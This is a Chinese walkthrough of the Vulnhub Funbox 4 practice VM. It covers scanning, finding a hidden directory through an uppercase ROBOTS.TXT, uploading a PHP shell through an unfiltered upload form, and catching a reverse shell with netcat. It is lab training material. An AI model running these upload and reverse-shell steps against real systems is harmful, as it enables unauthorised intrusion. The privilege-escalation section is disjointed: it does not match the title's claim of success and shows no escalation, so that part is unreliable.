Vulnhub之Funbox 4靶机详细测试过程（提权成功）

Funbox 4

靶机信息

名称:Funbox: CTF
URL:

1. https://www.vulnhub.com/entry/funbox-ctf,546/

复制代码

识别靶机IP地址

将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。
内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。

1. (kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                             
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:4e:f4:34      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.150  08:00:27:4e:a2:f4      1      60  PCS Systemtechnik GmbH           

复制代码

NMAP 扫描

利用NMAP工具进行全端口扫描：

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-06 02:45 EDT
4. Nmap scan report for bogon (192.168.56.150)
5. Host is up (0.00024s latency).
6. Not shown: 65531 closed tcp ports (reset)
7. PORT    STATE SERVICE VERSION
8. 22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
11. |   256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
12. |_  256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
13. 80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
14. |_http-title: Apache2 Ubuntu Default Page: It works
15. |_http-server-header: Apache/2.4.18 (Ubuntu)
16. 110/tcp open  pop3    Dovecot pop3d
17. |_pop3-capabilities: PIPELINING AUTH-RESP-CODE UIDL TOP SASL CAPA RESP-CODES
18. 143/tcp open  imap    Dovecot imapd
19. |_imap-capabilities: have SASL-IR capabilities LOGIN-REFERRALS IDLE ENABLE post-login OK LITERAL+ Pre-login listed ID more LOGINDISABLEDA0001 IMAP4rev1
20. MAC Address: 08:00:27:4E:A2:F4 (Oracle VirtualBox virtual NIC)
21. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
23. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
24. Nmap done: 1 IP address (1 host up) scanned in 9.70 seconds

复制代码

NMAP扫描结果表明目标主机有4个开放端口:
22(ssh)，80（http),110(pop3),143(imap)
获得Shell

1. └─$ nikto -h http://192.168.56.150
2. - Nikto v2.1.6
3. ---------------------------------------------------------------------------
4. + Target IP:          192.168.56.150
5. + Target Hostname:    192.168.56.150
6. + Target Port:        80
7. + Start Time:         2023-05-06 02:46:11 (GMT-4)
8. ---------------------------------------------------------------------------
9. + Server: Apache/2.4.18 (Ubuntu)
10. + The anti-clickjacking X-Frame-Options header is not present.
11. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
12. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
13. + No CGI Directories found (use '-C all' to force check all possible dirs)
14. + Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
15. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
16. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
17. + OSVDB-3233: /icons/README: Apache default file found.
18. + 7915 requests: 0 error(s) and 7 item(s) reported on remote host
19. + End Time:           2023-05-06 02:47:07 (GMT-4) (56 seconds)
20. ---------------------------------------------------------------------------

复制代码

其实作者给出了一个提示，即本靶机nikto时区分大小写。虽然/robots.txt文件不存在，看可测试大写字母的ROBOTS.TXT是否存在。

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
2. └─$ curl http://192.168.56.150/ROBOTS.TXT   
3. Disallow: upload/
6. Disallow: igmseklhgmrjmtherij2145236

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
2. └─$ curl http://192.168.56.150/igmseklhgmrjmtherij2145236/
3. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4. <html><head>
5. <title>403 Forbidden</title>
6. </head><body>
7. <h1>Forbidden</h1>
8. <p>You don't have permission to access /igmseklhgmrjmtherij2145236/
9. on this server.<br />
10. </p>
11. <hr>
12. <address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.150 Port 80</address>
13. </body></html>

复制代码

但是访问 igmseklhgmrjmtherij2145236 返回 forbidden的信息，因此可能该目录下存在子目录或者文件，继续用gobuster工具扫描.

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
2. └─$ gobuster dir -u http://192.168.56.150/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.js,.txt,.sh
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.150/igmseklhgmrjmtherij2145236/
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              php,html,bak,js,txt,sh
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/05/06 03:04:36 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 321]
19. /.php                 (Status: 403) [Size: 320]
20. /upload.html          (Status: 200) [Size: 297]
21. /upload               (Status: 301) [Size: 344] [--> http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/]
22. /upload.php           (Status: 200) [Size: 319]
23. Progress: 11663 / 1543927 (0.76%)^C
24. [!] Keyboard interrupt detected, terminating.

复制代码

上述目录下发现了/upload子目录以及upload.php 文件，后者允许我们上传文件，而且没有任何过滤机制，因此接下来就是上次shell.php文件，但是该文件放在什么位置呢，注意到有/upload子目录，可能在该子目录下，经访问验证了这一点：

1. http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/shell.php

复制代码

在Kali Linux上成功得到了目标主机反弹回来的shell.

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.230] from (UNKNOWN) [192.168.56.150] 48272
6. Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
7. 09:08:17 up 26 min,  0 users,  load average: 1.13, 1.81, 2.70
8. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
9. uid=33(www-data) gid=33(www-data) groups=33(www-data)
10. /bin/sh: 0: can't access tty; job control turned off
11. $ which python
12. /usr/bin/python
13. $ python -c 'import pty;pty.spawn("/bin/bash")'
14. www-data@funbox4:/$ cd /home
15. cd /home
16. www-data@funbox4:/home$ ls -alh
17. ls -alh
18. total 16K
19. drwxr-xr-x  4 root   root   4.0K Aug 29  2020 .
20. drwxr-xr-x 23 root   root   4.0K May  6 09:07 ..
21. drwx------  4 anna   anna   4.0K Aug 30  2020 anna
22. drwxr-xr-x  4 thomas thomas 4.0K Aug 30  2020 thomas
23. www-data@funbox4:/home$ cd anna
24. cd anna
25. bash: cd: anna: Permission denied
26. www-data@funbox4:/home$ cd thomas
27. cd thomas
28. www-data@funbox4:/home/thomas$ ls -alh
29. ls -alh
30. total 3.0M
31. drwxr-xr-x 4 thomas thomas 4.0K Aug 30  2020 .
32. drwxr-xr-x 4 root   root   4.0K Aug 29  2020 ..
33. -rw------- 1 thomas thomas   46 Aug 30  2020 .bash_history
34. -rw-r--r-- 1 thomas thomas  220 Aug 29  2020 .bash_logout
35. -rw-r--r-- 1 thomas thomas 3.7K Aug 29  2020 .bashrc
36. drwx------ 2 thomas thomas 4.0K Aug 29  2020 .cache
37. -rw-r--r-- 1 thomas thomas  675 Aug 29  2020 .profile
38. drwx------ 2 thomas thomas 4.0K Aug 30  2020 .ssh
39. -rw-r--r-- 1 thomas thomas  195 Aug 29  2020 .todo
40. -rw------- 1 thomas thomas 1.3K Aug 30  2020 .viminfo
41. -rw-rw-r-- 1 thomas thomas  217 Aug 30  2020 .wget-hsts
42. -rwx------ 1 thomas thomas 3.0M Aug 22  2019 pspy64

复制代码

Privilege Escalation

1. www-data@funbox4:/$ cat hint.txt
2. cat hint.txt
3. The OS beard ist whiter and longer as Gandalfs one !
4. Perhaps, its possible to get root from here.
5. I doesnt look forward to see this in the writeups/walktroughs,
6. but this is murpys law !
8. Now, rockyou.txt isnt your friend. Its a little sed harder :-)
10. If you need more brainfuck: Take this:
11. ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.
13. Bit more ?
14. Tm8gaGludHMgaGVyZSAhCg==
16. Not enough ?
17. KNSWC4TDNAQGM33SEB2G6ZDPOMXA====

复制代码

在目标主机shell中执行载荷，然后利用suggester模块定位合适的提权模块

1. ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.

复制代码

1. https://www.splitbrain.org/services/ook

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！